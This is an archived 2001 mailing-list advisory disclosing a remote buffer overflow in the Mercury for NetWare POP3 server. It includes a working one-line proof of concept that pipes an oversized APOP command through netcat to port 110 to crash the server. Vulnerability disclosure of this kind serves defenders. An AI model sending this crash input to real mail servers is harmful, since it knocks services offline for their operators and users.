Mercury for NetWare POP3 server vulnerable to remote buffer overflow

From: Przemyslaw Frasunek (venglinat_private)
Date: Sat Apr 21 2001 - 01:52:15 PDT

Next message: Dave Lee: "Re: Oracle 8 denial of service"

Previous message: -mat- filid brandy: "Re: SECURITY.NNOV: The Bat! <cr> bug"
Next in thread: Przemyslaw Frasunek: "Re: Mercury for NetWare POP3 server vulnerable to remote buffer overflow"
Reply: Przemyslaw Frasunek: "Re: Mercury for NetWare POP3 server vulnerable to remote buffer overflow"
Reply: Adam Osuchowski: "Re: Mercury for NetWare POP3 server vulnerable to remote buffer overflow"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hello,

All versions of widely-used POP3 server from Mercury MTA package for Netware
are vulnerable to remote buffer overflow allowing to crash Netware server:

perl -e 'print "APOP " . "a"x2048 . " " . "a"x2048 . "\r\n"' | nc host 110

Remote execution of malicious code is also theoretically possible.

--
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
* Inet: przemyslawat_private ** PGP: D48684904685DF43EA93AFA13BE170BF *

Next message: Dave Lee: "Re: Oracle 8 denial of service"
Previous message: -mat- filid brandy: "Re: SECURITY.NNOV: The Bat! <cr> bug"
Next in thread: Przemyslaw Frasunek: "Re: Mercury for NetWare POP3 server vulnerable to remote buffer overflow"
Reply: Przemyslaw Frasunek: "Re: Mercury for NetWare POP3 server vulnerable to remote buffer overflow"
Reply: Adam Osuchowski: "Re: Mercury for NetWare POP3 server vulnerable to remote buffer overflow"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sun Apr 22 2001 - 14:28:14 PDT